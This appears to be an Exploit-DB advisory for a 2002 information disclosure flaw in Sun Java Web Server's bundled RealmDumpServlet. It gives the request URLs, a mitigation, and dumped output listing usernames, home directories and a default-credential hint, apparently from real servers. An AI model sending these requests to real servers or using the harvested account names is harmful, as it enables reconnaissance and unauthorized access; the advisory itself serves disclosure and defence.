Sun Java Web Server RealmDumpServlet Information Disclosure Vulnerability

vendor:

Java Web Server

by:

SecurityFocus

7,5

CVSS

HIGH

Information Disclosure

200

CWE

Product Name: Java Web Server

Affected Version From: Sun Java Web Server 2.1

Affected Version To: Sun Java Web Server 2.1

Patch Exists: No

Related CWE: N/A

CPE: a:sun:java_web_server:2.1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows, Linux, Mac

2002

Sun Java Web Server RealmDumpServlet Information Disclosure Vulnerability

The servlet sunexamples.RealmDumpServlet, which is packaged by Default with Sun's Java Web Server, can be used to discover ACLs and local users on the server. It can be accessed by sending a request to http://javawebserver/servlet/sunexamples.RealmDumpServlet or http://javawebserver:8080/servlet/sunexamples.RealmDumpServlet#Realm-NT. This will reveal the list of users and their home directories on the server.

Mitigation:

Disable the servlet sunexamples.RealmDumpServlet or restrict access to it.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/1498/info

The servlet sunexamples.RealmDumpServlet, which is packaged by Default with Sun's Java Web Server, can be used to discover ACLs and local users on the server. 

http://javawebserver.com/pservlet.html

User: sherwin

User: floorsoft

User: shaw

User: sears

User: beaulieu

User: diyonline

User: chicken

User: homedepot

User: abbey

User: goodhome

User: design1

User: 121312

User: buildnet

User: lowes

User: admin

User: emmitt

User: tms

User: ifloor

User: jeeves

^-------------------- default user / pass for web server

User: gerald

User: dixie

User: homeportfolio

User: buildscape

User: chuck

http://javawebserver/servlet/sunexamples.RealmDumpServlet

http://javawebserver:8080/servlet/sunexamples.RealmDumpServlet#Realm-NT



Individual Users:


User: brianw, home = \\aussie\home\brianw

User: chabell, home = \\aussie\home\chabell

User: davisons, home = \\aussie\home\davisons

User: exchadmin, home =

User: IUSR_AUSSIE, home =

User: IWAM_AUSSIE, home =

User: jd, home = \\aussie\home\jd

User: kkl, home = \\aussie\home\kkl

User: lisamh, home = \\aussie\home\lisamh

User: mattix, home = \\aussie\home\mattix

User: maxadmin, home = \\aussie\home\maxadmin

User: maxdev, home = \\aussie\home\maxdev

User: maxguest, home =

User: mcgreer, home = \\aussie\home\mcgreer

User: mdavis, home = \\aussie\home\mdavis

User: nbrathod, home = \\aussie\home\nbrathod

User: prnees, home = \\aussie\home\prnees

User: renee, home = \\aussie\home\renee

User: smcelder, home = \\aussie\home\smcelder

User: SQLAgentCmdExec, home = H:


http://javawebserver/servlet/sunexamples.RealmDumpServlet#Users-UNIX

Individual Users:


User: root, home = /

User: daemon, home = /

User: bin, home = /usr/bin

User: sys, home = /

User: adm, home = /var/adm

User: lp, home = /usr/spool/lp

User: uucp, home = /usr/lib/uucp

User: nuucp, home = /var/spool/uucppublic

User: listen, home = /usr/net/nls

User: nobody, home = /

User: noaccess, home = /

User: nobody4, home = /

User: mc, home = /space/u/mc